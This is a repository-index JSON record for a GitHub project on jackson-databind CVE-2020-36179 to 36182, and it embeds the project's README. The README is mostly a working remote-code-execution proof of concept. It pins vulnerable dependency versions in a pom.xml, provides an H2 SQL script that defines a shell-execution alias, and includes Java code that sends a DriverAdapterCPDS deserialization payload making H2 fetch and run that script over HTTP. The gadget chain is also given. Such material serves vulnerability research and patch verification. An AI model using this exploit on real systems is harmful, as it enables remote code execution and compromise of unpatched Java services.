{"id":13844545,"url":"https://github.com/Al1ex/CVE-2020-36179","last_synced_at":"2025-07-11T23:33:44.223Z","repository":{"id":108707262,"uuid":"328321384","full_name":"Al1ex/CVE-2020-36179","owner":"Al1ex","description":"CVE-2020-36179~82  Jackson-databind SSRF\u0026RCE","archived":false,"fork":false,"pushed_at":"2021-01-10T06:48:53.000Z","size":181,"stargazers_count":79,"open_issues_count":0,"forks_count":9,"subscribers_count":3,"default_branch":"main","last_synced_at":"2024-08-05T17:42:22.568Z","etag":null,"topics":["cve-2020-36179","jackson-databind","rce","ssrf"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Al1ex.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-01-10T06:47:49.000Z","updated_at":"2024-04-01T15:17:38.000Z","dependencies_parsed_at":"2023-03-22T18:09:45.131Z","dependency_job_id":null,"html_url":"https://github.com/Al1ex/CVE-2020-36179","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Al1ex%2FCVE-2020-36179","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Al1ex%2FCVE-2020-36179/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Al1ex%2FCVE-2020-36179/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Al1ex%2FCVE-2020-36179/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Al1ex","download_url":"https://codeload.github.com/Al1ex/CVE-2020-36179/tar.gz/refs/hea
ds/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225772638,"owners_count":17521868,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2020-36179","jackson-databind","rce","ssrf"],"created_at":"2024-08-04T17:02:44.823Z","updated_at":"2024-11-21T17:30:21.209Z","avatar_url":"https://github.com/Al1ex.png","language":null,"funding_links":[],"categories":["Others"],"sub_categories":[],"readme":"## Description\r\nCVE-2020-36179：\r\nFasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.\r\n\r\nCVE-2020-36180：\r\nFasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.\r\n\r\nCVE-2020-36181：\r\nFasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS.\r\n\r\nCVE-2020-36182：\r\nFasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.\r\n\r\n## How to RCE\r\nBecause the above four CVE security vulnerabilities are triggered in a similar way, here we only take CVE-2020-36180 as an example:\r\n\r\npom.xml\r\n```\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n\u003cproject xmlns=\"http://maven.apache.org/POM/4.0.0\"\r\n   
      xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n         xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\"\u003e\r\n    \u003cmodelVersion\u003e4.0.0\u003c/modelVersion\u003e\r\n\r\n    \u003cgroupId\u003ecom.jacksonTest\u003c/groupId\u003e\r\n    \u003cartifactId\u003ejacksonTest\u003c/artifactId\u003e\r\n    \u003cversion\u003e1.0-SNAPSHOT\u003c/version\u003e\r\n    \u003cdependencies\u003e\r\n        \u003cdependency\u003e\r\n            \u003cgroupId\u003ecom.fasterxml.jackson.core\u003c/groupId\u003e\r\n            \u003cartifactId\u003ejackson-databind\u003c/artifactId\u003e\r\n            \u003cversion\u003e2.9.10.7\u003c/version\u003e\r\n        \u003c/dependency\u003e\r\n        \u003c!-- https://mvnrepository.com/artifact/org.apache.commons/commons-dbcp2 --\u003e\r\n        \u003cdependency\u003e\r\n            \u003cgroupId\u003eorg.apache.commons\u003c/groupId\u003e\r\n            \u003cartifactId\u003ecommons-dbcp2\u003c/artifactId\u003e\r\n            \u003cversion\u003e2.8.0\u003c/version\u003e\r\n        \u003c/dependency\u003e\r\n        \u003c!-- https://mvnrepository.com/artifact/com.h2database/h2 --\u003e\r\n        \u003cdependency\u003e\r\n            \u003cgroupId\u003ecom.h2database\u003c/groupId\u003e\r\n            \u003cartifactId\u003eh2\u003c/artifactId\u003e\r\n            \u003cversion\u003e1.4.199\u003c/version\u003e\r\n        \u003c/dependency\u003e\r\n\r\n        \u003cdependency\u003e\r\n            \u003cgroupId\u003eorg.slf4j\u003c/groupId\u003e\r\n            \u003cartifactId\u003eslf4j-nop\u003c/artifactId\u003e\r\n            \u003cversion\u003e1.7.2\u003c/version\u003e\r\n        \u003c/dependency\u003e\r\n        \u003c!-- https://mvnrepository.com/artifact/javax.transaction/jta --\u003e\r\n        \u003cdependency\u003e\r\n            \u003cgroupId\u003ejavax.transaction\u003c/groupId\u003e\r\n            
\u003cartifactId\u003ejta\u003c/artifactId\u003e\r\n            \u003cversion\u003e1.1\u003c/version\u003e\r\n        \u003c/dependency\u003e\r\n    \u003c/dependencies\u003e\r\n\u003c/project\u003e\r\n```\r\n\r\nexec.sql:\r\n```\r\nCREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {\r\n        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\");\r\n        return s.hasNext() ? s.next() : \"\";  }\r\n$$;\r\nCALL SHELLEXEC('calc.exe')\r\n```\r\n\r\npoc.java\r\n```\r\nimport com.fasterxml.jackson.databind.ObjectMapper;\r\nimport com.fasterxml.jackson.databind.SerializationFeature;\r\n\r\n\r\npublic class POC {\r\n    public static void main(String[] args) throws Exception {\r\n        String payload = \"[\\\"org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS\\\",{\\\"url\\\":\\\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:3333/exec.sql'\\\"}]\";\r\n        ObjectMapper mapper = new ObjectMapper();\r\n        mapper.enableDefaultTyping();\r\n        mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);\r\n        Object obj = mapper.readValue(payload, Object.class);\r\n        mapper.writeValueAsString(obj);\r\n    }\r\n}\r\n```\r\n\r\nresult:\r\n\r\n![result](img/result.jpg)\r\n\r\nGadget:\r\n\r\n```\r\nDriverAdapterCPDS\r\n    -\u003esetUrl\r\n        -\u003egetPooledConnection\r\n            -\u003eDriverManager.getConnection(this.url,username,pass)\r\n```\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAl1ex%2FCVE-2020-36179","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FAl1ex%2FCVE-2020-36179","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAl1ex%2FCVE-2020-36179/lists"}